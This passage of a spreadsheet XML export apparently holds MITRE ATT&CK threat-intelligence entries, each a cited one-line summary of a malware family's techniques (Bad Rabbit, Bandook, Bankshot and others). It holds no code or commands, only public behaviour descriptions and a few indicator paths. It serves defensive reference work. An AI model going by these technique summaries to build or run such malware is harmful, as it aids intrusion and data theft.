    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--b82ea861-86df-4574-9727-f0d5828e9fe8</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--e823be4b-50b9-4430-9010-e960b46bdfcc</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--73d8feea-0b53-419a-be1b-5750aa47f2df</t>
  </si>
  <si>
    <t xml:space="preserve">[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)	</t>
  </si>
  <si>
    <t>relationship--2597e12c-c342-4ca0-a235-b05752b2bfa5</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--bf0fd2a9-0852-4a4e-a806-281c0a7d63e3</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--197ade21-6787-4ed3-a3ce-ff4b59b2f15c</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--efcd3e1b-d17b-4c7f-97fd-b438ebef6760</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in &lt;code&gt;%USERPROFILE%\Adobe\Driver\dwg\&lt;/code&gt; and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--ebf39235-749f-400e-aeb9-185df9e43fe1</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as &lt;code&gt;ShellExecuteA&lt;/code&gt; and &lt;code&gt;HttpOpenRequestA&lt;/code&gt; in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--1c0296de-dc33-4fd7-b774-1bbe8c1b56b7</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--66ce5052-08d8-4160-a8c9-f3e6b9e5cd1f</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--c0417cdc-0451-41e3-8937-88e9ebd68d1a</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--8763c8dd-cd68-4402-be43-4dbd96c83c2d</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--0614fc3b-614c-4d50-9ae2-ab526160faf5</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--c3086516-a419-4e7f-87c4-e37f08d0f27a</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--06aa7096-4813-4f50-a69a-7bcd6503ffe4</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--a1dc7c15-bd44-43b3-a32b-8e4ea9856758</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples contain a publicly available Web browser password recovery tool.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--adf7a6a5-91b0-4c37-9fa5-0bfbb382a838</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects address book information from Outlook.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--98abda72-4760-4e8c-ab6c-5ed080868cfc</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) contains a cleanup module that removes traces of itself from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--1d54c1d7-529f-4e4f-9a38-55b1b8cbff66</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</si>
  <si>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</si>
  <si>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relationship--b8f1354c-9cff-40ef-aa47-591952c735c3</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can download additional modules from C2.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--984a898c-f469-4e7c-94c6-bf512ec69938</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use a network scanning module to identify ICS-related ports.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--129d828d-a84b-43dc-afc1-f46d8a25de0a</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about running processes.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--b6ae274b-f0b3-4694-ab8d-37e0c62cff35</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) injects itself into explorer.exe.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--535e3fbe-e6d9-4608-9689-f8f1f8c1ddc9</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) adds Registry Run keys to achieve persistence.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--087721ee-6643-4453-8a76-8768ced7e506</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can enumerate and map ICS-specific systems in victim environments.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--efa28055-ee37-4501-8316-32a9c709ee98</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can use rundll32 for execution on compromised hosts.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--504b9a6b-bb70-4055-876b-12aafb342f69</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--7123a6ee-2026-4db8-a983-cbc2932c2a09</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the OS and computer name.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--f19234f6-5b59-4229-aae1-70df380a076a</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--45a9a394-2371-4751-ae86-043630b6f52a</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects the current username from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--d2d9a619-4379-4e15-9115-40ca9209f316</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has attempted to bypass UAC and gain elevated administrative privileges.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--666ef8c1-cc87-4efa-9f35-f9bf1d1317c6</t>
  </si>
  <si>
    <t>04 May 2021</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has encrypted files and disks using AES-128-CBC and RSA-2048.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--0252fc3f-1bf0-433f-b619-b874137f84f3</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) spread through watering holes on popular sites by injecting JavaScript into the HTML body or a &lt;code&gt;.js&lt;/code&gt; file.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--5ac3cb45-2d9c-42da-b35f-8f797c2e1ef8</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) used the EternalRomance SMB exploit to spread through victim networks.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--754d1521-2fcf-4511-b7df-af4fffc7d635</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used an executable that installs a modified bootloader to prevent normal boot-up.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--2374acc8-5a15-40cb-bafc-d74c5097249b</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials from the victim's machine.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--62c9428a-c3cf-476e-b125-a6478bc1bfa1</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has been executed through user installation of an executable disguised as a flash installer.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--9d9e1fc8-7e93-41e3-b648-762f6f6db384</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has masqueraded as a Flash Player installer through the executable file &lt;code&gt;install_flash_player.exe&lt;/code&gt;.(Citation: ESET Bad Rabbit)(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--509a016a-6243-40b1-b1b5-74f6c79ce413</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used various Windows API calls.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--b2852e21-c31a-482a-85fd-00d0990ee8ea</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) enumerates open SMB shares on internal victim networks.(Citation: ESET Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--7431f8d2-32df-4b26-8b17-24f10f861fde</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file uses NTLM login credentials to brute force Windows machines.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--0b8b803a-69e3-4da4-bed6-a28de4c964da</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) can enumerate all running processes to compare hashes.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--70b27780-b19a-4313-88ea-1038ce0fc386</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) has used rundll32 to launch a malicious DLL as &lt;code&gt;C:Windowsinfpub.dat&lt;/code&gt;.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--849e3f46-81a5-4865-9a14-fbbf67bfd00a</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file creates a scheduled task to launch a malicious executable.(Citation: Secure List Bad Rabbit)</t>
  </si>
  <si>
    <t>relationship--455fed31-0d5c-42cb-9a79-03df7600db52</t>
  </si>
  <si>
    <t>[Bad Rabbit](https://attack.mitre.org/software/S0606) drops a file named &lt;code&gt;infpub.dat&lt;/code&gt;into the Windows directory and is executed through SCManager and &lt;code&gt;rundll.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--341ef3b2-3f92-4ea1-b36f-93fdb1d15816</t>
  </si>
  <si>
    <t>S0337</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>malware--9af05de0-bc09-4511-a350-5eb8b06185c1</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--dc2b58dd-1052-4860-8e14-5650ab8eecfd</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) searches for files with specific file extensions.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--5b83337c-5030-402d-ad28-1b9f5cf782cc</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) can download and execute or update malware.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--91eab726-0a0c-4898-8376-66987fd1037c</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) has a keylogging capability.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--626b1cb2-60a8-4077-913e-1ee4e788cec6</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) stores collected data in log files before exfiltration.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--330e86f3-f4ff-4fe0-af64-cd3c86849239</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses SMTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--3126e151-051a-45ba-bc52-ca6f0f646fbb</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) establishes a foothold by adding a link to the malware executable in the startup folder.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--11d37d18-3ad6-41ed-a99e-f1cc9d524c6c</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) captures screenshots in .jpg format and then exfiltrates them.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--5249b0e7-878e-44db-9d59-f162067f1852</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses WMI to enumerate installed security products in the victim’s environment.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--c443cc21-5f8f-4c12-8848-39c469a1c9b2</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information. (Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--5ffaf382-3e91-409b-932f-24d107c59308</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--520faa7e-f529-4b54-b4dc-55d6ae094717</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>relationship--389029e4-c8bc-48e7-9e46-ca513eeda5ca</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing audio.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>relationship--1148c339-09f2-4518-9562-c6aa11d5474f</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) was signed with valid Certum certificates.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--ff471404-75be-4ebe-a585-4b6d1d27887e</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Java-based payloads.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--89e07be1-6d8b-4886-ab3d-68fb23275c8c</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can collect local files from the system .(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--f5f24a8f-6d98-4f00-9db2-e92189f7d67a</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has decoded its PowerShell script.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--ebd78850-caf0-4e14-8338-0f7347063afc</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can upload files from a victim's machine over the C2 channel.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--13ef6179-f624-4a3f-8095-a86609e31828</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has a command to delete a file.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--cd9d7183-d7c2-4253-ab57-1c53a6d00a1a</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has a command to list files on a system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--7a453aab-789d-4fd5-9360-37c3f88ee3c6</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can download files to the system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--47afdb05-0327-4feb-b80e-1be491b57693</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) contains keylogging capabilities.(Citation: BH Manul Aug 2016)</t>
  </si>
  <si>
    <t>relationship--3450fcde-caba-4595-b28b-99f18b4a4b7a</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has used lure documents to convince the user to enable macros.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--b4beede8-130b-4c99-b123-f7079896e28d</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has used the ShellExecuteW() function call.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--bd5fd2c2-a9a3-401e-8723-92df94f9c482</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has a command built in to use a raw TCP socket.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--7bf27f61-0191-4c20-ae96-96c38322470d</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can detect USB devices.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>relationship--5047ac79-8ed7-4f22-bfa2-fad8195f72b8</t>
  </si>
  <si>
    <t>04 June 2021</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used PowerShell loaders as part of execution.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--b36ef70d-6691-4f3b-a1ca-08d4aadaac7e</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has been launched by starting iexplore.exe and replacing it with [Bandook](https://attack.mitre.org/software/S0234)'s payload.(Citation: Lookout Dark Caracal Jan 2018)(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--3cc0af18-2897-4008-a2b0-0234df50acde</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Python-based payloads.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--cab79b3a-4ea7-455a-9373-e8ac0d8e612f</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of taking an image of and uploading the current desktop.(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--a80ece05-37e1-4828-a9e8-27b30524960b</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is delivered via a malicious Word document inside a zip file.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--817f5a5a-c22b-4d49-8e5a-35b48da7c358</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used .PNG images within a zip file to build the executable. (Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--5791055c-1a0c-460e-91cc-7d85278ce533</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used AES encryption for C2 communication.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--d7f3c107-cf9c-4cb3-9d58-56199962e8c5</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) can collect information about the drives available on the system.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--b42354ae-384d-4885-96a0-1594ed6dd427</t>
  </si>
  <si>
    <t xml:space="preserve">[Bandook](https://attack.mitre.org/software/S0234) has a command to get the public IP address from a system.(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--b1ef4ee2-30bc-4f25-9e77-cf9d6cc576a8</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing video from a victim's webcam.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>relationship--c4f9c2ad-f740-4b08-9788-c058b98f2094</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has used malicious VBA code against the target system.(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--c339e33e-11c1-4fd3-a117-fab3e44bc714</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>relationship--3379cbbb-cb69-4dbd-856c-70f88eb256bc</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) recursively generates a list of files within a directory and sends them back to the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--87648492-36d0-4f94-b318-17280b101678</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--c151ee77-66ca-4b86-bc13-84759cf71321</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) collects files from the local system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--119cfc44-4018-4ce0-b223-b0f353d1c113</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) decodes embedded XOR strings.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5412525e-cba5-4fa1-89ff-7e6fa2b92e24</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--ac6ce385-79d5-40bd-ab16-bd873fb1a821</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) exfiltrates data over its C2 channel.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--cb297293-d9bb-484a-a9fb-b7b09477d38f</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--314a5160-17e0-44eb-9f4b-1a8e216b56a2</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--172a8a26-d2c9-4d29-b050-55949c0186dd</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for files on the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--25d926a0-d2b5-473d-b27b-fb69cf763b77</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) deletes all artifacts associated with the malware from the infected machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--df520c15-50fc-46cf-8559-368e88072aa7</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uploads files and secondary payloads to the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a15e391d-cc21-484d-839a-b7057ae40179</t>
  </si>
  <si>
    <t>relationship--a35c951b-5987-4028-b002-a2078ad9c0a7</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) writes data into the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj&lt;/code&gt;.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--c0d119a2-c5f9-4c18-a18c-28bfa576ea9a</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--70648d67-a2f5-4021-8ffe-3bbcdbe8e78f</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) encodes commands from the control server using a range of characters and gzip.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--78f8338a-ac4e-42cf-a887-cc35e842dc11</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--e9b71895-a9d2-4023-930b-4204f6c2d325</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) identifies processes and collects the process ids.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--37ece881-96cf-441a-981d-ff3eeac292d7</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) generates a false TLS handshake using a public certificate to disguise C2 network communications.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--945a3286-2197-4984-8838-837afcd7925c</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for certain Registry keys to be configured before executing the payload.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--77d079b6-2df9-4ae9-bc7c-1ebe99708660</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers system information, network addresses, disk type, disk free space, and the operation system version.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--55de5c21-4cb1-4235-89b5-df77dfc7fa90</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) modifies the time of a file as specified by the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--26352538-769c-42c0-9e38-0338c5891432</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses HTTP for command and control communication.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>relationship--0fd9bb83-40f0-42ae-8e73-5d207434a757</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses the command-line interface to execute arbitrary commands.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--c9a7b725-bdab-4955-a963-b747a406102b</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) can terminate a specific process by its process id.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5782aac5-a4c6-4d17-88c9-e29b795e3ee7</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use TLS in C2 communications.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>relationship--1495ec37-a51f-4a50-8c01-427d7c4bb009</t>
  </si>
  <si>
    <t>19 November 2020</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been downloaded via Windows BITS functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
